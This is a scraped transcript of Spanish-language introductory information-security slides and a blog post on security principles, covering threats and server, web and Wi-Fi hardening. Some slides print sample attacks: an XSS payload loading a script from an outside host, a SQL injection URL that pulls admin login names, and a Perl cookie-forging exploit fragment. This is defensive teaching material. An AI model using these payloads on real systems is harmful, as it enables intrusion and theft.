You are on page 1of 11

Fundamentos Seguridad Informatica Clase 1 Presentation Transcript

1. Fundamentos de Seguridad de la Informacin Ing. Marco Castro Javier 2. Qu se debe Asegurar? La informacin debe considerarse un activo importante con el que cuentan las Organizaciones para satisfacer sus objetivos, razn por la cual, tiene un alto valor para las mismas y es crtica para su desempeo y subsistencia. Por tal motivo, al igual que el resto de los activos organizacionales , debe asegurarse que est debidamente protegida. 3. Contra qu se debe proteger la informacin? (destruccin parcial o total por incendio inundaciones, eventos elctricos y otros) como de orden deliberado, tal como fraude, espionaje, sabotaje, vandalismo, etc. Las buenas prcticas en Seguridad de la Informacin, protegen a sta contra una amplia gama de amenazas, tanto de orden fortuito 4. Vulnerabilidades y Amenazas Una vulnerabilidad es una debilidad en un activo. Una amenaza es una violacin potencial de la seguridad. No es necesario que la violacin ocurra para que la amenaza exista. Las amenazas explotan vulnerabilidades. 5. Se garantiza que la informacin es accesible slo a aquellas personas autorizadas. 1. CONFIDENCIALIDAD Qu se debe garantizar? 6. 2. INTEGRIDAD Se salvaguarda la exactitud y totalidad de la informacin y los mtodos de procesamiento y transmisin. Qu se debe garantizar? 7. Se garantiza que los usuarios autorizados tienen acceso a la informacin y a los recursos relacionados toda vez que lo requieran. 3. DISPONIBILIDAD Qu se debe garantizar? 8. Aumento de los niveles de seguridad en las organizaciones La implementacin de una PSI, le permite a las Organizaciones cumplir una gestin efectiva de los recursos de informacin crticos e instalar y administrar los mecanismos de proteccin adecuados, determinando qu conductas son permitidas y cules no. Esto redundar en una efectiva reduccin de los niveles de riesgo y de las vulnerabilidades, lo cual, en definitiva, se traduce en ahorro de tiempo y dinero, genera mayor confianza y un fortalecimiento de la imagen institucional. Poltica de Seguridad de Ia Informacin

Seguridad Informatica, via Meeting.cl


4 years ago Email

Favorite Favorited Download Embed Zipcast More

Copy and paste this code into your blog or website Customize Without related content

Copy

Start from slide number

Size (px) 340 x 284 425 x 355 510 x 426 595 x 497 Embed code for WordPress.com blogs Close Copy

We have emailed the verification/download link to "zetsk8@hotmail.com". Login to your email and click the link to download the file directly.
Principio del formulario

zetsk8@ho

To request the link at a different email address, update it here.


Update

Close Validation messages. Success message. Fail message.


Final del formulario

Check your bulk/spam folders if you can't find our mail.


Close
Principio del formulario

separate ta

Favorited! You could add some tags too

Post

Have an opinion? Make a quick comment as well.


Final del formulario

Cancel


Principio del formulario

Edit your favorites


Save

Cancel
Final del formulario

Principio del formulario

Select Group / Event

Send to your Group / Event

Add your message

Send

Cancel
Final del formulario

Like this presentation? 0 comments


Principio del formulario

Embed Video
Post Comment

Subscribe to comments Unsubscribe from comments

Final del formulario Principio del formulario

Update

Edit your comment


Final del formulario

Cancel

Speaker Notes on slide 1 Seguridad Informatica, via Meeting.cl - Presentation Transcript


1. Seguridad Informtica - Fundamentos de la seguridad informtica - Seguridad en ambiente de servidores - Seguridad en plataformas Web - Cmo proteger las redes Wi-Fi - Recomendaciones generales para Internet

2. Seguridad Informtica http://www.seguridad-informatica.cl CONCEPTOS BSICOS DE LA SEGURIDAD INFORMTICA CONFIDENCIALIDAD INTEGRIDAD DISPONIBILIDAD AUTENTICIDAD

3. Seguridad Informtica http://www.seguridad-informatica.cl CONCEPTOS BSICOS DE LA SEGURIDAD INFORMTICA No existe la absoluta seguridad !! Todo es rompible si se le aplica fuerza. Una caja de vidrio se puede romper, pero tambin una caja fuerte de titanio. Qu es ms seguro: la caja de vidrio o la de titanio? Evidentemente la de titanio, pero esto depende solamente de que herramienta utilicemos para romperla. Todo se puede vulnerar. La nica razn por la cual utilizamos rejas de fierros en nuestras casas y los bancos es porque hace que el ataque sea ms lento. 4. Seguridad Informtica http://www.seguridad-informatica.cl CONCEPTOS BSICOS DE LA SEGURIDAD INFORMTICA Entonces, Cmo nos protegemos de la forma ms eficiente posible? Determinando que queremos proteger (ej: Hardware, datos privados, datos pblicos, sistemas, etc) Estableciendo prioridades de los factores a proteger Formando polticas de seguridad Manteniendo la seguridad en el tiempo

5. Seguridad Informtica http://www.seguridad-informatica.cl CONCEPTOS BSICOS DE LA SEGURIDAD INFORMTICA Debemos enfocarnos en REDUCIR EL RIESGO, y no en tratar de eliminar las amenazas, ya que es imposible. Para eso debemos saber de QUE o QUIENES nos protegemos y tambin COMO nos atacan.

6. Seguridad Informtica http://www.seguridad-informatica.cl SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB 7. Seguridad Informtica http://www.seguridad-informatica.cl Ataques Internos - Premeditacin (Empleados mal intencionados o ex empleados con informacin privilegiada) - Descuido - Ignorancia - Indiferencia de las politicas de seguridad Ataques externos - Hackers, Crackers, Lammers, Script-Kiddies - Motivaciones: Ranking, reto personal, robo de datos, pruebas (pen test), etc.

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB 8. Seguridad Informtica http://www.seguridad-informatica.cl Ataques Internos Suplantacin de identidad Sniffing (Incluso administradores pueden hacer sniffing. Sugerencia: CIFRAR) Robo de informacin (Ej: para la competencia) Virus, Troyanos, Gusanos Espionaje: Trashing, Shoulder Surfing, Grabaciones, etc Keylogging - Keycatching

Keycatcher: SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB 9. Seguridad Informtica http://www.seguridad-informatica.cl Ataques Externos Ataques contra servicios WEB Cross Site Scripting (XSS) SQL Injection Exploits Robo de Identidad Denegacin de Servicio (DoS) y Denegacin de Servicio Distribuido (DDoS) SPAM VIRUS Phishing (Whishing, Hishing)

Troyanos

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB 10.Seguridad Informtica http://www.seguridad-informatica.cl XSS SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB 11.Seguridad Informtica http://www.seguridad-informatica.cl XSS: http://docs.info.apple.com/article.html? artnum=';a=document.createElement('script');a.src='http://h4k.in/i.js';d ocument.body.appendChild(a);//';alert(1)//%22;alert(2)//22;alert(3)//-%3E SQL Injection: http://www.sitiovulnerable.com/index.php?id=10 UNION SELECT TOP 1 login_name FROM admin_login-- SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB 12.Seguridad Informtica http://www.seguridad-informatica.cl #!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; $host=shift; if ($host eq &quot;&quot;) { print &quot;Usage: webeye-xp.pl <host name> &quot;; exit; } my $browser = LWP::UserAgent->new(); my $resp = $browser->get(&quot;http://$host/admin/wg_userinfo.ml&quot;,&quot;Cookie&quot;,&quot;USER_ID=0; path=/;&quot;); $t = $resp->content; #print $t; &quot;; Ejemplo de un exploit en PERL : SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB 13.Seguridad Informtica http://www.seguridad-informatica.cl SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB CONVIRTIENDO NUESTROS SERVICIOS EN FORTALEZAS 14.Seguridad Informtica http://www.seguridad-informatica.cl COMO NOS DEFENDEMOS? Debemos crear una lista de mandamientos que debemos seguir al pie de la letra. No olvidarse que el hecho de no cumplir con alguno de estos mandamientos inevitablemente caeremos en un mayor riesgo para los servicios que queremos proteger. SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB 15.Seguridad Informtica http://www.seguridad-informatica.cl LOS MANDAMIENTOS MAS IMPORTANTES DE SEGURIDAD Siempre respetar las polticas de seguridad Siempre tener nuestros servicios actualizados a la ltima versin conocida estable Utilizar mecanismos de criptografa para almacenar y transmitir datos sensibles Cambiar las claves cada cierto tiempo Auto-auditar nuestros propios servicios. Autoatacarnos para saber si somos o no vulnerables Estar siempre alerta. Nunca pensar a nosotros nadie nos ataca. No dejar respaldos con informacin sensible en directorios web No usar las mismas claves para servicios distintos (ej, la clave de root sea la misma que la de MySQL)

SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB

16.Seguridad Informtica http://www.seguridad-informatica.cl SERVICIOS DE INTERNET - Cambiar los puertos por defecto - Garantizar el acceso solo a cuentas especficas - Aplicar tcnicas de Hardening - Para servicios privados y confidenciales utilizar tneles seguros (VPN cifradas) en Internet y redes no seguras - Eliminar todos los banners posibles y sobre todo las versiones - Habilitar mdulos de seguridad (Ej mod_security en Apache) - Levantar Firewalls e IDS/IPS - Crear cuentas de sistema restringidas (aunque no tengan privilegios) SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB 17.Seguridad Informtica http://www.seguridad-informatica.cl - Nunca trabajar con root si no es estrictamente necesario - Proteger con doble contrasea si es posible - Elegir contraseas seguras, mezclando maysculas, minsculas, nmeros y caracteres especiales. Las claves no deben ser palabras coherentes (ej: Admin25) - Cerrar puertos y eliminar aplicaciones innecesarias - Borrar robots.txt y estadsticas pblicas Proteger las URL (ej: mod_rewrite) SERVICIOS DE INTERNET SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB 18.Seguridad Informtica http://www.seguridad-informatica.cl SERVICIOS DE INTERNET - Tener cuidado con los archivos temporales en directorios WEB. Ejemplo: index.php~ (terminados en caracter squiggle o pigtail (literalmente: cola de chancho) - Realizar respaldos peridicamente y probar que funcionen - Conocer las tcnicas de ataque ms conocidas Auditar los cdigos con herramientas de seguridad - Si ejecutan algn servidor de base de datos, permitir solamente comunicacin con interfaz loopback y no dejar sin contrasea las bases de datos. - En lo posible no utilizar servicios como: - WEBMIN - phpMyAdmin - Interfaces WEB en routers o dispositivos de red SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB 19.Seguridad Informtica http://www.seguridad-informatica.cl UN POCO MAS DE SEGURIDAD CON APACHE Y PHP Apache. En httpd.conf activar las siguientes directivas: ServerTokens Prod ServerSignature Off ServerAdmin <direccion@decorreo.com> habilitar mod_security y mod_rewrite PHP .En php.ini php_expose=off esconde php mode_safe=on evita que se ejecuten funciones como system(), passthru(), exec(), etc. evitar scripts con phpinfo(); SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB 20.Seguridad Informtica http://www.seguridad-informatica.cl Algunos ejemplos: SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB 21.Seguridad Informtica http://www.seguridad-informatica.cl Algunos ejemplos: SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB Direccin: http://www.sitioweb.com/config.php ESTA PAGINA ES PRIVADA 22.Seguridad Informtica http://www.seguridad-informatica.cl Algunos ejemplos: SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB Direccin: http://www.sitioweb.com/config.php ~ <?php /*Variables base de datos*/ $sys['db_host'] = &quot;localhost&quot;; $sys['db_username'] = &quot;root&quot;; $sys['db_password'] =

&quot;123&quot;; $sys['db_database'] = &quot;base_de_datos&quot;; echo &quot;<center>ESTA PAGINA ES PRIVADA&quot;; ?> 23.Seguridad Informtica http://www.seguridad-informatica.cl Algunos ejemplos: SEGURIDAD EN AMBIENTE DE SERVIDORES Y PLATAFORMAS WEB Solucin al problema anterior: UN CRON QUE ELIMINE LOS ARCHIVOS TEMPORALES /etc/crontab */5 * * * * root rm /var/www/*.*~ 24.Seguridad Informtica http://www.seguridad-informatica.cl PROTECCIN DE REDES WI-FI 25.Seguridad Informtica http://www.seguridad-informatica.cl PROTECCIN DE REDES WI-FI EL GRAN PROBLEMA DE LAS REDES WI-FI ES GRAN EXTENSIN FSICA (No hay cables) LO QUE CONLLEVA A QUE SEA MS FCIL ACCEDER A ELLAS REMOTAMENTE EXISTEN UNA SERIE DE MEDIDAS QUE SE PUEDEN TOMAR PARA REDUCIR EL RIESGO DE ATAQUES. 26.Seguridad Informtica http://www.seguridad-informatica.cl PROTECCIN DE REDES WI-FI Apagar el router o access point cuando no se ocupe Nunca entregar la clave Wi-Fi a terceros Utilizar claves de tipo WPA2. Como segunda opcin WPA y en el peor de los casos WEP (128 y 64 bits) Habilitar el control de acceso por MAC. Son fciles de clonar pero pone una barrera ms Deshabilitar servicios innecesarios en el router (SNMP, Telnet, SSH, etc) Deshabilitar el acceso inalmbrico a la configuracin Cambiar los puertos por defecto de los servicios necesarios en el router (ej: http a 1000) Desactivar el broadcasting SSID Desactivar DHCP. Utilizar slo IP manuales dentro de rangos poco convencionales. (Ej: 90.0.10.0 90.0.10.254) Usar VPN si fuese posible.

27.Seguridad Informtica http://www.seguridad-informatica.cl PROTECCIN DE REDES WI-FI Cambiar regularmente las claves Wi-Fi (tanto administracin como clave de red). Guardar bien las claves de administracin Usar contraseas complicadas. (Ej: E_aR@_1-x No usar dispositivos Wi-Fi cerca de hornos microondas ni telfonos inalmbricos Realizar un scaneo local de las redes disponibles para evitar interferencias.

LOS CANALES QUE NO SE INTERFIEREN SON: 1, 6 y 11

28.Seguridad Informtica http://www.seguridad-informatica.cl HERRAMIENTAS DE SEGURIDAD 29.Seguridad Informtica http://www.seguridad-informatica.cl HERRAMIENTAS DE SEGURIDAD COMERCIALES GFI LANGUARD SECURITY SCANNER www.gfi.com N-Stalker (ex N-Stealth) www.nstalker.com ACUNETIX WEB SCANNER www.acunetix.com 30.Seguridad Informtica http://www.seguridad-informatica.cl HERRAMIENTAS DE SEGURIDAD GRATIS NMAP (Network Mapper) www.insecure.org/nmap NESSUS www.nessus.org 31.Seguridad Informtica http://www.seguridad-informatica.cl PREGUNTAS??

Cinco fundamentos de la seguridad informtica


Publicado el 09 julio 2010 por Juan Rodriguez

Los ataques informticos pueden provenir de una variedad de vectores o factores como preferais llamarlos. Por lo tanto, las defensas deben ser muchas todas las que sean necesarias para detener un ataque. Pero estas defensas deben basarse en cinco principios bsicos de la seguridad informtica. Estas sientan las bases para un sistema seguro.
Los cinco principios basicos para construir una defensa contra los ataques en su sistema informatico son: Capas. Limitar. Diversidad. Oscuridad. Sencillez o Simplicidad.

* El concepto de capas gira en torno a la prctica de poner ms de un tipo de defensa en la red. Si un atacante tiene como objetivo sitios especficos de tu red, deberas temer

que atraviese ms de una barrera con el fin de comprometer tu

sistema. Cada nivel de tu defensa debe ser ms complicada y compleja que la anterior. Con una defensa por capas el atacante tendr que dominar varias herramientas y habilidades para romper todas las capas de la defensa. * La limitacin se refiere a la cantidad de acceso y usuarios a la informacin que deben tener de tu sistema . Slo aquellos que necesitan los datos deberan tener acceso a ella. Adems, la cantidad de informacin debe limitarse a lo que una persona necesita saber. Por ejemplo, los permisos de archivos y los procedimientos deben estar en el lugar que defina claramente el alcance de su acceso. La clave es que el acceso debe limitarse a un nivel como mnimo posible.

* Diversidad trabaja con el concepto de capas en el que las tcnicas de un atacante utiliza una capa de la violacin debe ser diferente de las tcnicas necesarias para penetrar en la capa siguiente. La diversidad se puede lograr de muchas maneras, por ejemplo, puede ser tan simple como el uso de productos de seguridad de distintos fabricantes.

* La tcnica de la seguridad por oscuridad implica la realizacin de lo que pasa dentro de tu organizacin o el sistema informtico invisible y reducir al mnimo cualquier patrn repetitivo de comportamiento observable. Un ejemplo sera el mantenimiento de los equipos informticos de tipo, el sistema operativo, aplicaciones y versiones lejos de las miradas indiscretas de un atacante potencial. Si un atacante realiza un reconocimiento y descubre lo que est funcionando en la red, entonces ser capaz de determinar sus puntos dbiles. * Simplicidad significa que el administrador del sistema, los usuarios y el personal encargado de la seguridad debe ser capaz de comprender y utilizar las defensas en su lugar. Los sistemas internos de seguridad suelen ser eludidas a que sean ms fciles para los usuarios. Por desgracia, tambin puede hacer que sea ms fcil para los atacantes. El concepto en el ncleo del principio de simplicidad es que la seguridad debe ser complejo desde el exterior y simple en el interior. Mientras tu ests asegurando tu sistema te encontrars con muchos ataques y defensas de uso mltiple; estas defensas deben basarse en los cinco principios fundamentales de seguridad para garantizar una proteccin ptima.
http://www.vtc.com/products/Fundamentals_of_Computer_Security_Tutorials.ht m

You might also like